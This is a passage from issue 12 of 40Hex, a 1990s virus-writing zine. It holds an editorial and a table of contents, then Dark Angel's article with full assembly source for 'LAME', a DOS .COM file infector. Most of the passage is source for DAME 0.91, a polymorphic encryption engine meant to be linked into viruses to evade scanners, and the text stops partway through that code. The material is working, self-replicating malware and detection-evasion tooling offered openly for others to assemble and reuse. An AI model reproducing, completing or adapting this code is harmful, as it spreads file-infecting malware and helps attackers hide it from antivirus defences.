40Hex Number 12 Volume 3 Issue 3 File 000 Welcome to 40Hex issue 12. This issue confirms that we are no longer in our hibernation period (i.e. laziness). We have been out of the virus scene for quite some time, due to physical circumstances beyond our control. We have done a lot of reorganization, and trimmed our fat a little bit. You can expect a lot from us in the upcoming year, and I can assure you, you won't be dissappointed. Due to the large gap of time between issue 11 and issue 12, some of the information in here may be a little outdated. We are going to get a little bit more political then we used to be, but we will still keep cranking out the high quality technical information that you all enjoy. I would strongly recommend that you don't skip over the political parts of the magazine, because there are people who want to make laws that will affect every reader of this magazine. On a completely seperate note, we can now be reached via Internet. If you have any comments about the magazine, news articles, editorials, etc. we'd like to know, and we'll probably put all of the interesting letters into the magazine. Email us at: fortyhex@mindvox.phantom.com ->GHeap Table Of Contents 40Hex-12.000....................We're ba-ack 40Hex-12.001....................DAME Source 'Updated' 40Hex-12.002....................40Hex Hardcopy Rumors Confirmed 40Hex-12.003....................A Self Dis-Infecting .COM File 40Hex-12.004....................AIS BBS Commentary 40Hex-12.005....................Natas Virus By Priest 40Hex-12.006....................A Commentary by Sara Gordon 40Hex-12.007....................Nympho Mitosis 2.0 Debug Script 40Hex-12.008....................Viruses In The News 40Hex-12.009....................OS/2 Virus Source Greets Fly out to: Urnst Kouch [And all other Crypt People], Nowhere Man, The Attitude Adjuster, Omega and all of TridenT, Arthur Ellis, and anyone else we may have forgotten. 40Hex Number 12 Volume 3 Issue 3 File 001 DAME, Revisited By Dark Angel of Phalcon/Skism As many of you may have noticed, the DAME presented in the last issue of 40Hex many moons ago had a few flaws, chief of which was a problem with the prefetch queue. Thanks to everyone who pointed this out to me and jeers to Intel. It was also a mite weak in the code generated. This version corrects several flaws present in the original version. See the source code for a more in-depth discussion of the improvements. In this article, I present another lame virus to be linked with DAME. The debug script is included at the end of the article and the source code can be found following this short text. Before attempting to assemble the source code, note that it is broken up into two files: LAME.ASM and DAME.ASM. MAKE SURE YOU SEPARATE THEM FIRST! Some complained that the source code didn't assemble in the last issue; that was simply because they didn't break up the files. DA --Begin LAME.ASM--------------------------------------------------------------- .model tiny .code .radix 16 org 100 start: jmp temp ; The next two lines will be patched in ; cld ; DAME may have altered DF ; mov bx,ds call calc_off old4 dw 20cdh, 0 fmask db '*.com',0 dmask db '..',0 db 0dh,'This is a lame virus slapped together by DA/PS',0Dh,0A db 'To demonstrate DAME 0.91',0Dh,0A,1a vars = 0 include dame.asm ; include the code portion of DAME calc_off: pop si mov ax,si mov cl,4 shr ax,cl sub ax,10 add ax,bx mov bx,offset enter_vir push ax bx retf enter_vir: mov di,100 push es di es es movsw movsw enter_vir0: push cs cs pop es ds mov ah,1a mov dx,offset new_dta ; set new DTA int 21 mov ah,47 cwd mov si,offset old_path+1 mov byte ptr [si-1],'\' int 21 mov inf_cnt,4 call rnd_init_seed inf_dir:mov ah,4e mov dx,offset fmask fnext: int 21 jnc inf_file mov ah,3bh mov dx,offset dmask int 21 jnc inf_dir done_all: mov ah,3bh mov dx,offset old_path int 21 pop es ds ; restore the DTA mov dx,80 mov ah,1a int 21 retf ; return to carrier inf_file: mov ax,3d00 mov dx,offset new_dta + 1e int 21 jc _fnext xchg ax,bx mov ah,3f mov cx,4 mov dx,offset old4 int 21 mov ah,3e int 21 cmp old4,0e9fc jz _fnext add al,ah cmp al,'Z'+'M' jz _fnext call infect dec inf_cnt jz done_all _fnext: mov ah,4f jmp short fnext infect: mov ax,3d00 mov dx,offset new_dta + 1e int 21 push ax xchg ax,bx mov ax,1220 int 2f mov ax,1216 mov bl,es:di mov bh,0 int 2f pop bx mov word ptr es:[di+2],2 mov ax,es:[di+11] mov bp,ax mov cx,4 sub ax,cx mov patch,ax mov ah,40 mov dx,offset oFCE9 int 21 mov word ptr es:[di+15],bp push es di cs pop es mov si,100 mov di,offset copyvirus mov cx,(heap - start + 1)/2 rep movsw mov ax,0000000000001011b mov dx,offset copyvirus mov cx,heap - start mov si,offset _decryptbuffer mov di,offset _encryptbuffer push dx bx si mov bx,bp inc bh call dame mov ah,40 pop dx bx int 21 mov ah,40 mov cx,heap - start pop dx int 21 pop di es or byte ptr es:[di+6],40 mov ah,3e int 21 retn oFCE9 dw 0e9fc heap: patch dw ? inf_cnt db ? vars = 1 include dame.asm ; include the heap portion of DAME old_path db 41 dup (?) new_dta db 2c dup (?) _encryptbuffer: db 80 dup (?) _decryptbuffer: db 1a0 dup (?) copyvirus db heap - start + 20 dup (?) temp: mov byte ptr ds:[100],0fc mov word ptr ds:[101],0db8c xor di,di push cs di cs cs jmp enter_vir0 end start --End LAME.ASM--Begin DAME.ASM------------------------------------------------- comment # Dark Angel's Multiple Encryptor Version 0.91 By Dark Angel of Phalcon/Skism This source may be freely distributed. Modifications are encouraged and modified redistribution is allowed provided this notice and the revision history to date are not altered. You are free to append to the revision history and update the usage information. Welcome to the source code for Dark Angel's Multiple Encryptor. I, Dark Angel, will be your host for this short excursion through a pretty nifty encryptor. DAME 0.90 (1574 bytes) ~~~~ ~~~~ ~~~~~~~~~~~~ Initial release. DAME 0.91 (1960 bytes) ~~~~ ~~~~ ~~~~~~~~~~~~ Source code commented. The user no longer needs to call the encryption routine manually; the routine calls it automatically. This makes DAME a bit more "user friendly." Garbling with two pointer registers simultaneously, i.e. [bx+di+offset] is now supported. Added "double-reference" encryptions. Example: mov ax,[bx+3212] xor ax,3213 mov [bx+3212],ax There is now a bitflag option to generate a decryptor which will transfer control to the buffer on a paragraph boundary. There is now a 1% chance that no encryption will be encoded when the "do_encrypt1" routine is called. Of course, null effect encryptors may still be generated. garble_jmpcond is much more robust. It can now put valid instructions between the conditional jump and the target of the jump. Therefore, there is no longer a multitude of JZ $+2's and the like. Instead, they are replaced by JZ $+4, XOR BX,BX, for example. The register tracker is cleared after the loop is completed. This makes sense, since the registers are no longer needed. This also allows for the manipulation of those used registers in the garbling after the loop is completed. Encoding routines enhanced: Two-byte PUSHes and POPs and four-byte register MOVes added. Memory PUSHes and POPs are now supported. The maximum nesting value is now the variable _maxnest, which can range from 0 to MAXNEST. _maxnest is determined randomly at runtime. This makes the decryption routines a bit more interesting. _nest is also cleared more times during the run so that variability is continuous throughout. Short decryptor option added. This is automatically used when generating the encryptor so the encryptor will always be of minimal length. More alignments are now possible. This makes the initial values of the registers more flexible. BUG FIXES: BP is now preserved on exit Prefetch queue flushed on backwards encryption; 386+ hangs eliminated. See routine named "clear_PIQ" Loopnz routines had possibility of not working properly; instruction eliminated. NOTES: I forgot to give credit to the person from whom I stole the random number routines. I took them from the routine embedded in TPE 1.x (I misremember the version number). Many thanks to Masud Khafir! USAGE: ON ENTRY: ax = flags bit 15 : Use two registers for pointer : 0 = no, 1 = yes bit 14 : Align size : 0 = word, 1 = dword bit 13 : Encryption direction : 0 = forwards, 1 = backwards bit 12 : Counter direction : 0 = forwards, 1 = backwards bit 11 : Counter register used : 0 = no, 1 = yes bit 10 : Temporary storage for double reference bit 9 : Unused bit 8 : Unused bit 7 : Unused bit 6 : Unused bit 5 : Unused bit 4 : Unused bit 3 : return control on paragraph boundary : 1 = yes, 0 = no bit 2 : short decryptor : 1 = yes, 0 = no (implies no garbling) bit 1 : garble : 1 = yes, 0 = no bit 0 : SS = DS = CS : 1 = yes, 0 = no bx = start decrypt in carrier file cx = encrypt length dx = start encrypt si = buffer to put decryption routine di = buffer to put encryption routine ds = cs on entry es = cs on entry RETURNS: cx = decryption routine length DF cleared all other registers are preserved. The RADIX is set to 16d. NOTES: rnd_init_seed is _not_ called by DAME. The user must explicitly call it. The buffer containing the routine to be encrypted should be 20 bytes larger than the size of the routine. This allows padding to work. The decryption routine buffer should be rather large to accomodate the large decryptors which may be generated. The encryption routine buffer need not be very large; 80h bytes should suffice. 90d bytes is probably enough, but this value is untested. # .radix 10h ifndef vars vars = 2 endif if not vars eq 1 ; if (vars != 1) _ax = 0 _cx = 1 _dx = 2 _bx = 3 _sp = 4 _bp = 5 _si = 6 _di = 7 _es = 8 _cs = 9 _ss = 0a _ds = 0bh ; The constant MAXNEST determines the maximum possible level of nesting ; possible in any generated routine. If the value is too large, then ; recursion problems will cause a stack overflow and the program will ; crash. So don't be too greedy. 0Ah is a safe value to use for non- ; resident viruses. Use smaller values for resident viruses. ifndef MAXNEST ; User may define MAXNEST prior to including MAXNEST = 0a ; the DAME source code. The user's value will endif ; then take precedence rnd_init_seed: push dx cx bx mov ah,2C ; get time int 21 in al,40 ; port 40h, 8253 timer 0 clock mov ah,al in al,40 ; port 40h, 8253 timer 0 clock xor ax,cx xor dx,ax jmp short rnd_get_loop_done get_rand: push dx cx bx in al,40 ; get from timer 0 clock db 5 ; add ax, xxxx rnd_get_patch1 dw 0 db 0BA ; mov dx, xxxx rnd_get_patch2 dw 0 mov cx,7 rnd_get_loop: shl ax,1 rcl dx,1 mov bl,al xor bl,dh jns rnd_get_loop_loc inc al rnd_get_loop_loc: loop rnd_get_loop rnd_get_loop_done: mov rnd_get_patch1,ax mov rnd_get_patch2,dx mov al,dl pop bx cx dx retn reg_table1: ; reg1 reg2 mod/00/rm This is used to handle memory addressing db _bx, 84, 10000111b ; of the form [reg1+reg2+xxxx] db _bp, 84, 10000110b ; if (reg2 == 84) db _di, 84, 10000101b ; reg2 = NULL; db _si, 84, 10000100b db _bp, _di, 10000011b db _bp, _si, 10000010b db _bx, _di, 10000001b db _bx, _si, 10000000b db _di, _bp, 10000011b db _si, _bp, 10000010b db _di, _bx, 10000001b db _si, _bx, 10000000b aligntable db 3,7,0bh,0f,13,17,1bh,1f ; possible alignment masks redo_dame: pop di bp si dx cx bx ax dame: ; Dark Angel's Multiple Encryptor cld push ax bx cx dx si bp di call _dame pop di push cx di call di pop di cx bp si dx bx bx ax ret _dame: ; set up initial values of the variables cld push ax mov ax,offset _encryptpointer xchg ax,di ; save the pointer to the stosw ; encryption routine buffer xchg si,ax ; also save the pointer to stosw ; the decryption routine ; buffer in the same manner stosw xchg ax,dx ; starting offset of stosw ; encryption xchg ax,bx ; starting offset of stosw ; decryption routine xchg cx,dx ; dx = encrypt size xor ax,ax mov cx,(endclear1 - beginclear1) / 2; clear additional data rep stosw ; area call get_rand ; get a random number and ax,not 0f ; clear user-defined bits pop cx ; cx = bitmask xor cx,ax ; randomize top bits call get_rand_bx ; get a random number and bx,7 ; and lookup in the table mov al,byte ptr [bx+aligntable] ; for a random rounding size cbw add dx,ax ; round the encryption not ax ; size to next word, dword, and dx,ax ; etc. mov ax,dx ; save the new encryption stosw ; length (_encrypt_length) shr ax,1 ; convert to words test ch,40 ; encrypting double wordly? jz word_encryption ; nope, only wordly encryption shr ax,1 ; convert to double words word_encryption: ; all the worldly encryption test ch,10 ; shall do thee no good, my jnz counter_backwards ; child, lest you repent for neg ax ; the sins of those who would counter_backwards: ; bring harm unto others stosw ; save _counter_value push dx ; Save rounded length call get_rand ; get a random value for the stosw ; encryption value ; (_decrypt_value) pop ax ; get rounded encryption length ; in bytes test ch,20 ; is the encryption to run jnz encrypt_forwards ; forwards or backwards? neg ax ; Adjust for forwards encrypt_forwards: xor bx,bx ; Assume pointer_value2 = 0 test ch,80 ; Dual pointer registers? jz no_dual call get_rand_bx sub ax,bx no_dual:stosw ; Save the pointers to the xchg ax,bx ; decryption (_pointer_value1 stosw ; and _pointer_value2) ; The following lines determine the registers that go with each function. ; There are a maximum of four variable registers in each generated ; encryption/decryption routine pair -- the counter, two pointer registers, ; and an encryption value register. Only one pointer register need be present ; in the pair; the other three registers are present only if they are needed. s0: call clear_used_regs mov di,offset _counter_reg mov al,84 ; Assume no counter register test ch,8 ; Using a counter register? jz s1 call get_rand ; get a random initial value mov _pointer_value1,ax ; for the pointer register call get_another ; get a counter register s1: stosb ; Store the counter register xchg ax,dx mov al,84 ; Assume no encryption register call one_in_two ; 50% change of having an js s2 ; encryption register ; Note: This merely serves as ; an extra register and may or ; may not be used as the ; encryption register. call get_another ; get a register to serve as s2: stosb ; the encryption register cmp ax,dx ; normalise counter/encryption ja s3 ; register pair so that the xchg ax,dx ; smaller one is always in the s3: mov ah,dl ; high byte cmp ax,305 ; both BX and BP used? jz s0 ; then try again cmp ax,607 ; both SI and DI used? jz s0 ; try once more s4: mov si,offset reg_table1 ; Use the table mov ax,3 ; Assume one pointer register test ch,80 ; Using two registers? jz use_one_pointer_reg add si,4*3 ; Go to two register table add al,4 ; Then use appropriate mask use_one_pointer_reg: call get_rand_bx ; Get a random value and bx,ax ; Apply mask to it add si,bx ; Adjust table offset add bx,bx ; Double the mask add si,bx ; Now table offset is right lodsw ; Get the random register pair mov bx,ax ; Check if the register in the and bx,7 ; low byte is already used cmp byte ptr [bx+_used_regs],0 jnz s4 ; If so, try again mov bl,ah ; Otherwise, check if there is or bl,bl ; a register in the high byte js s5 ; If not, we are done cmp byte ptr [bx+_used_regs],0 ; Otherwise, check if it is jnz s4 ; already used s5: stosw ; Store _pointer_reg1, movsb ; _pointer_reg2, and ; _pointer_rm calculate_maxnest: call get_rand ; Random value for _maxnest and al,0f ; from 0 to MAXNEST cmp al,MAXNEST ; Is it too large? ja calculate_maxnest ; If so, try again stosb ; Otherwise, we have _maxnest call clear_used_regs ; mark no registers used encode_setup: ; encode setup portion mov di,_decryptpointer ; (pre-loop) of the routines call twogarble ; start by doing some garbling ; on the decryption routine mov si,offset _counter_reg ; now move the initial push si ; values into each variable encode_setup_get_another: ; register -- encode them in a call get_rand_bx ; random order for further ; variability and bx,3 ; get a random register to en- mov al,[si+bx] ; code, i.e. counter, pointer, cbw ; or encryption value register test al,80 ; is it already encoded? jnz encode_setup_get_another ; then get another register or byte ptr [bx+_counter_reg],80 ; mark it encoded in both the mov si,ax ; local and inc byte ptr [si+_used_regs] ; master areas add bx,bx ; convert to word offset mov dx,word ptr [bx+_counter_value] ; find value to set the ; register to mov _nest,0 ; clear the current nest count call mov_reg_xxxx ; and encode decryption routine ; instruction call twogarble ; garble it some more call swap_decrypt_encrypt ; now work on the encryption ; routine push cx ; save the current bitmap and cl,not 7 ; encode short routines only call _mov_reg_xxxx ; encode the encryption routine ; instruction pop cx ; restore bitmap mov _encryptpointer,di ; return attention to the ; decryption routine pop si mov dx,4 encode_setup_check_if_done: ; check if all the variables ; have been encoded lodsb ; get the variable test al,80 ; is it encoded? jz encode_setup ; nope, so continue encoding dec dx ; else check the next variable jnz encode_setup_check_if_done ; loop upwards mov si,offset _encryptpointer ; Save the addresses of the mov di,offset _loopstartencrypt ; beginning of the loop in movsw ; the encryption and decryption movsw ; routines ; Encode the encryption/decryption part of loop mov _relocate_amt,0 ; reset relocation amount call do_encrypt1 ; encode encryption test ch,40 ; dword encryption? jz dont_encrypt2 ; nope, skip mov _relocate_amt,2 ; handle next word to encrypt call do_encrypt1 ; and encrypt! dont_encrypt2: ; Now we are finished encoding the decryption part of the loop. All that ; remains is to encode the loop instruction, garble some more, and patch ; the memory manipulation instructions so they encrypt/decrypt the proper ; memory locations. mov bx,offset _loopstartencrypt ; first work on the encryption push cx ; save the bitmap and cl,not 7 ; disable garbling/big routines call encodejmp ; encode the jmp instruction pop cx ; restore the bitmap mov ax,0c3fc ; cld, ret ; encode return instruction stosw ; in the encryption routine mov si,offset _encrypt_relocator ; now fix the memory mov di,_start_encrypt ; manipulation instructions push cx ; cx is not auto-preserved call relocate ; fix address references pop cx ; restore cx mov bx,offset _loopstartdecrypt ; Now work on decryption call encodejmp ; Encode the jmp instruction push di ; Save the current pointer call clear_used_regs ; Mark all registers unused pop di ; Restore the pointer call twogarble ; Garble some more test cl,8 ; Paragraph alignment on jnz align_paragraph ; entry to virus? test ch,20 ; If it is a backwards jz no_clear_prefetch ; decryption, then flush the call clear_PIQ ; prefetch queue (for 386+) no_clear_prefetch: ; Curse the PIQ!!!!! call twogarble ; Garble: the final chapter jmp short PIQ_done align_paragraph: mov dx,di ; Get current pointer location sub dx,_decryptpointer2 ; Calculate offset when control add dx,_start_decrypt ; is transfered to the carrier inc dx ; Adjust for the JMP SHORT inc dx neg dx and dx,0f ; Align on the next paragraph cmp dl,10-2 ; Do we need to JMP? jnz $+7 ; Yes, do it now test ch,20 ; Otherwise, check if we need jz PIQ_done ; to clear the prefetch anyway call clear_PIQ_jmp_short ; Encode the JMP SHORT PIQ_done: mov _decryptpointer,di mov si,offset _decrypt_relocator ; Calculate relocation amount sub di,_decryptpointer2 add di,_start_decrypt relocate: test ch,20 ; Encrypting forwards or jz do_encrypt_backwards ; backwards? add di,_encrypt_length ; Backwards is /<0oI_ do_encrypt_backwards: ; uh huh uh huh uh huh sub di,_pointer_value1 ; Calculate relocation amount sub di,_pointer_value2 mov cx,word ptr [si-2] ; Get relocation count jcxz exit_relocate ; Exit if nothing to do xchg ax,di ; Otherwise we be in business relocate_loop: ; Here we go, yo xchg ax,di lodsw ; Get address to relocate xchg ax,di add [di],ax ; Relocate mah arse! loop relocate_loop ; Do it again 7 times exit_relocate: ; ('cause that makes 8) mov di,_decryptpointer ; Calculate the decryption mov cx,di ; routine size to pass sub cx,_decryptpointer2 ; back to the caller ret encodejmp: mov di,word ptr [bx+_encryptpointer-_loopstartencrypt] push bx mov _nest,0 ; Reset nest count mov al,_pointer_reg1 ; Get the pointer register and ax,7 ; Mask out any modifications mov dx,2 ; Assume word encryption test ch,40 ; Word or Dword? jz update_pointer1 shl dx,1 ; Adjust for Dword encryption update_pointer1: test ch,20 ; Forwards or backwards? jz update_pointer2 neg dx ; Adjust for backwards update_pointer2: test ch,80 ; Are there two pointers? jz update_pointer_now ; Continue only if so sar dx,1 ; Halve the add value push ax ; Save register to add call add_reg_xxxx ; Add to first register mov al,_pointer_reg2 and ax,7 ; Add to the second pointer call add_reg_xxxx ; register pop bx test ch,8 ; Using a counter register? jnz update_pointer_done ; If not, continue this push bx ; Save first register xchg ax,dx ; Move second register to DX call get_another ; Get new register regX call mov_reg_reg ; MOV regX, _pointer_reg2 pop dx ; Restore first register call add_reg_reg ; ADD regX, _pointer_reg1 call clear_reg ; Clear the temp register jmp short update_pointer_done ; Skip adjustment of pointer ; register (already done) update_pointer_now: call add_reg_xxxx ; Adjust pointer register update_pointer_done: mov dl,75 ; Assume JNZ mov al,_counter_reg ; Is there a counter register? and ax,7 cmp al,_sp jz do_jnz push dx ; Save JNZ mov dx,1 ; Assume adjustment of one test ch,10 ; Check counter direction jz go_counter_forwards ; If forwards, increment the ; counter cmp al,_cx ; Check if the counter is CX jnz regular ; If not, then decrement the ; counter and continue call one_in_two ; Otherwise, there is a 50% js regular ; chance of using a LOOP pop dx mov dl,0e2 ; let us encode the LOOP jmp short do_jnz regular:neg dx go_counter_forwards: call add_reg_xxxx ; Adjust counter register pop dx do_jnz: pop bx mov ax,[bx] ; Calculate value to JNZ/LOOP sub ax,di ; back dec ax dec ax xchg ah,al ; Value is in AL mov al,dl ; jnz or ah,ah ; Value >= 128? If so, it is js jmplocation_okay ; impossible to JNZ/LOOP there ; due to stupid 8086 limitation pop ax ax ; Take return locations off jmp redo_dame ; the stack and encode again jmplocation_okay: stosw ; Encode JNZ/LOOP instruction mov word ptr [bx+_encryptpointer-_loopstartencrypt],di ret ; Save current location encryption: ; This routine encodes the instruction which actually manipulates the memory ; location pointed to by the pointer register. and ch,not 4 ; Default = no double reference call one_in_two ; But there is a 50% chance of js not_double_reference ; using a double reference or ch,4 ; Yes, we are indeed using it not_double_reference: mov di,_decryptpointer ; Set the registers to work mov bp,offset _decrypt_relocate_num ; with the decryption routine call twogarble ; Insert some null instructions xor ax,ax ; Get the value for the rm mov al,_pointer_rm ; field corresponding to the ; pointer register/s used call choose_routine ; Get random decryption type call go_next ; to DX, BX, SI push si dx si dx ; Save crypt value/register ; and crypt pointer ;; mov _nest,0 ; not needed - choose_routine does it test ch,4 jz not_double_reference1 ; Double reference? xchg ax,dx ; Pointer register/s to dx call get_another ; Unused register to AX (reg1) call mov_reg_reg ; MOV reg1,[pointer] mov _kludge,dx ; Store the pointer register not_double_reference1: pop dx si ; Restore decryption pointer call handle_jmp_table ; Encode decryption routine push bx ; Save routine that was used call twogarble ; Garble some more for fun test ch,4 jz not_double_reference2 ; Double reference? xchg ax,dx ; reg1 to dx mov ax,_kludge ; Restore pointer push ax ; Save pointer call mov_reg_reg ; MOV [pointer],reg1 call clear_reg_dx ; Return reg1 to free pool pop ax ; Restore pointer not_double_reference2: mov bp,offset _encrypt_relocate_num ; Set the registers to work call swap_decrypt_encrypt ; with the encryption routine pop bx dx si ; Restore crypt value/register call go_next ; Convert to encryption table jmp short finish_encryption ; and encode the encryption ; corresponding to the ; decryption do_encrypt1: ; Perform encryption on a word call playencrypt ; Alter encryption value call get_rand ; Have a tiny chance cmp ax,6 ; (1% chance) of not jb playencrypt ; encrypting at all call encryption ; Encrypt! playencrypt: ; Update the encryption value mov di,_decryptpointer call twogarble mov al,_encrypt_reg ; Encryption register used? and ax,7 cmp al,4 jz swap_decrypt_encrypt call get_rand_bx ; 75% chance of altering the cmp bl,0c0 ; encryption value register ja swap_decrypt_encrypt ; Exit if nothing is to occur call choose_routine ; Select a method of updating call handle_jmp_table_nogarble ; Encode the decryption call swap_decrypt_encrypt ; Now work on encryption finish_encryption: push cx ; Save current bitmask and cl,not 7 ; Turn off garbling/mo routines call [bx+si+1] ; Encode the same routine for ; the encryption pop cx ; Restore the bitmask mov _encryptpointer,di ret choose_routine: mov _nest,0 ; Reset recursion counter call one_in_two ; 50% chance of using an js get_used_register ; already used register as ; an update value call get_rand_bx ; Get random number as the ; update value mov si,offset oneregtable ; Choose the update routine ; from this table jmp short continue_choose_routine ; Saves one byte over ; xchg dx,bx / ret get_used_register: ; This routine returns, in DX, a register whose value is known at the current ; point in the encryption/decryption routines. SI is loaded with the offset ; of the appropriate table. The routine destroys BX. call get_rand_bx ; Get a random number and bx,7 ; Convert to a register (0-7) cmp bl,_sp ; Make sure it isn't SP; that jz get_used_register ; is always considered used cmp byte ptr [bx+_used_regs],0 ; Check if the register is jz get_used_register ; currently in use mov si,offset tworegtable ; Use routine from this table continue_choose_routine: xchg dx,bx ; Move value to dx ret ; and quit swap_decrypt_encrypt: mov _decryptpointer,di ; save current pointer push ax mov al,_maxnest ; disable garbling mov _nest,al pop ax mov di,_encryptpointer ; replace with encryption ret ; pointer go_next: ; Upon entry, SI points to a dispatch table. This routine calculates the ; address of the next table and sets SI to that value. push ax lodsb ; Get mask byte cbw ; Convert it to a word add si,ax ; Add it to the current pop ax ; location (table+1) inc si ; Add two more to adjust inc si ; for the mask ret ; (mask = size - 3) clear_used_regs: xor ax,ax ; Mark registers unused mov di,offset _used_regs ; Alter _used_regs table stosw stosw inc ax ; Mark SP used stosw dec ax stosw ret get_another: ; Get an unused register call get_rand ; Get a random number and ax,7 ; convert to a register ; cmp al,_sp ; jz get_another mov si,ax cmp [si+_used_regs],0 ; Check if used already jnz get_another ; Yes, try again inc [si+_used_regs] ; Otherwise mark the register ret ; used and return clear_reg_dx: ; Mark the register in DX xchg ax,dx ; unused clear_reg: ; Mark the register in AX mov si,ax ; unused mov byte ptr [si+_used_regs],0 ret free_regs: ; This checks for any free registers and sets the zero flag if there are. push ax cx di mov di,offset _used_regs mov cx,8 xor ax,ax repne scasb pop di cx ax ret one_in_two: ; Gives 50% chance of push ax ; something happening call get_rand ; Get a random number or ax,ax ; Sign flag set 50% of the pop ax ; time ret get_rand_bx: ; Get a random number to BX xchg ax,bx ; Save AX call get_rand ; Get a random number xchg ax,bx ; Restore AX, set BX to the return: ; random number ret garble_onebyte: ; Encode a single byte that doesn't do very much, i.e. sti, int 3, etc. xchg ax,dx ; Get the random number in AX and al,7 ; Convert to table offset mov bx,offset onebytetable ; Table of random bytes xlat ; Get the byte stosb ; and encode it ret garble_jmpcond: ; Encode a random short conditional or unconditional JMP instruction. The ; target of the JMP is an unspecified distance away. Valid instructions ; take up the space between the JMP and the target. xchg ax,dx ; Random number to AX and ax,0f ; Convert to a random JMP or al,70 ; instruction stosw ; Encode it push di ; Save current location call garble ; May need to check if too large mov ax,di ; Get current location pop bx ; Restore pointer to the JMP sub ax,bx ; Calculate the offset mov byte ptr [bx-1], al ; Put it in the conditional ret ; JMP clear_PIQ: ; Encode instructions that clear the prefetch instruction queue. ; CALL/POP ; JMP SHORT ; JMP call get_rand ; Get a random number mov dl,ah ; Put high byte in DL and dx,0f ; Adjust so JMP target is ; between 0 and 15 bytes away and ax,3 ; Mask AX jz clear_PIQ_call_pop ; 1/4 chance of CALL/POP dec ax jz clear_PIQ_jmp_short ; 1/4 chance of JMP SHORT mov al,0e9 ; Otherwise do a straight JMP clear_PIQ_word: ; Handler if offset is a word stosb ; Store the JMP or CALL xchg ax,dx ; Offset to AX stosw ; Encode it clear_PIQ_byte: ; Encode AX random bytes push cx xchg ax,cx ; Offset to CX jcxz random_encode_done ; Exit if no bytes in between random_encode_loop: call get_rand ; Get a random number stosb ; Store it and then do this loop random_encode_loop ; again random_encode_done: pop cx ret clear_PIQ_jmp_short: mov al,0ebh ; JMP SHORT stosb ; Encode the instruction xchg ax,dx stosb ; and the offset jmp short clear_PIQ_byte ; Encode intervening bytes clear_PIQ_call_pop: mov al,0e8 ; CALL call clear_PIQ_word ; Encode instruction, garbage call garble ; Garble some and then find call get_another ; an unused register call clear_reg ; keep it unused jmp short _pop ; and POP into it twogarble: ; Garble twice mov _nest,0 ; Reset nest count call garble ; Garble once garble: ; ax, dx preserved ; Garble call free_regs ; Are there any unused jne return ; registers? test cl,2 ; Is garbling enabled? jz return ; Exit if not push ax dx si call get_rand ; Get a random number into xchg ax,dx ; DX call get_another ; And a random reg into AX call clear_reg ; Don't mark register as used mov si,offset garbletable ; Garble away jmp short handle_jmp_table_nopush handle_jmp_table: ; ax,dx preserved ; This is the master dispatch call garble ; Garble before encoding handle_jmp_table_nogarble: ; Encode it push ax dx si handle_jmp_table_nopush: push ax lodsb ; Get table mask cbw ; Clear high byte call get_rand_bx ; Get random number and bx,ax ; Get random routine pop ax test cl,4 ; Short decryptor? jnz doshort ; If so, use first routine inc _nest ; Update nest count push ax mov al,_maxnest cmp _nest,al ; Are we too far? pop ax jb not_max_nest ; If so, then use the first doshort:xor bx,bx ; routine in the table not_max_nest: push bx ; Save routine to be called call [bx+si] ; Call the routine pop bx si dx ax ret garble_tworeg: ; Garble unused register with the contents of a random register. mov si,offset tworegtable ; Use reg_reg table and dx,7 ; Convert to random register # jmp short handle_jmp_table_nogarble ; Garble away garble_onereg: ; Garble unused register with a random value (DX). mov si,offset oneregtable ; Point to the table jmp short handle_jmp_table_nogarble ; and garble _push: ; Encode a PUSH or al,al ; PUSHing memory register? js _push_mem call one_in_two ; 1/2 chance of two-byte PUSH js _push_mem add al,50 ; otherwise it's really easy stosb ret _push_mem: add ax,0ff30 jmp short go_mod_xxx_rm1 _pop: ; Encode a POP or al,al ; POPing a memory register? js _pop_mem call one_in_two ; 1/2 chance of two-byte POP js _pop_mem add al,58 stosb ret _pop_mem: mov ah,8f go_mod_xxx_rm1: jmp mod_xxx_rm mov_reg_xxxx: ; ax and dx preserved mov si,offset mov_reg_xxxx_table go_handle_jmp_table1: jmp short handle_jmp_table _mov_reg_xxxx_mov_add: call get_rand_bx ; Get a random number push bx ; Save it sub dx,bx ; Adjust MOV amount call mov_reg_xxxx ; MOV to register pop dx ; Get random number jmp short go_add_reg_xxxx ; Add it to the register _mov_reg_xxxx_mov_al_ah: cmp al,_sp jae _mov_reg_xxxx push ax dx call _mov_al_xx pop dx ax xchg dh,dl jmp short _mov_ah_xx _mov_reg_xxxx_mov_xor: call get_rand_bx push bx xor dx,bx call mov_reg_xxxx pop dx jmp xor_reg_xxxx _mov_reg_xxxx_xor_add: push dx mov dx,ax call xor_reg_reg pop dx go_add_reg_xxxx: jmp add_reg_xxxx _mov_reg_xxxx_mov_rol: ror dx,1 call mov_reg_xxxx jmp short _rol _mov_reg_xxxx_mov_ror: rol dx,1 call mov_reg_xxxx _ror: or al,8 _rol: mov ah,0d1 jmp short go_mod_xxx_rm1 _mov_reg_xxxx: call one_in_two ; 1/2 chance of a four byte MOV js _mov_reg_xxxx1 add al,0B8 stosb xchg ax,dx stosw ret _mov_reg_xxxx1: ; Do the four byte register MOV mov ah,0c7 jmp mod_xxx_rm_stosw mov_ah_xx: _mov_ah_xx: add al,04 mov_al_xx: _mov_al_xx: add al,0B0 mov ah,dl stosw ret mov_reg_reg: ; ax, dx preserved mov si,offset mov_reg_reg_table jmp short go_handle_jmp_table1 _mov_reg_reg_push_pop: push ax xchg dx,ax call _push ; PUSH REG2 pop ax jmp _pop ; POP REG1 _mov_reg_reg: mov ah,08Bh jmp short _mod_reg_rm_direction mov_xchg_reg_reg: call one_in_two js mov_reg_reg xchg_reg_reg: ; ax, dx preserved mov si,offset xchg_reg_reg_table go_handle_jmp_table2: jmp short go_handle_jmp_table1 _xchg_reg_reg_push_pop: push dx ax dx call _push ; PUSH REG1 pop ax call _push ; PUSH REG2 pop ax call _pop ; POP REG1 pop ax jmp _pop ; POP REG2 _xchg_reg_reg_3rd_reg: call free_regs jne _xchg_reg_reg push dx ax call get_another ; Get free register (reg3) call mov_xchg_reg_reg ; MOV/XCHG REG3,REG2 pop dx call xchg_reg_reg ; XCHG REG3,REG1 pop dx xchg ax,dx call mov_xchg_reg_reg ; MOV/XCHG REG2,REG3 jmp clear_reg_dx _xchg_reg_reg: or al,al js __xchg_reg_reg cmp al,dl jg _xchg_reg_reg_skip xchg al,dl _xchg_reg_reg_skip: or dl,dl jz _xchg_ax_reg __xchg_reg_reg: xchg al,dl mov ah,87 jmp short _mod_reg_rm _xchg_ax_reg: add al,90 stosb ret xor_reg_xxxx_xor_xor: call get_rand_bx push bx xor dx,bx call xor_reg_xxxx pop dx jmp short xor_reg_xxxx xor_reg_xxxx: mov si,offset xor_reg_xxxx_table jmp short go_handle_jmp_table2 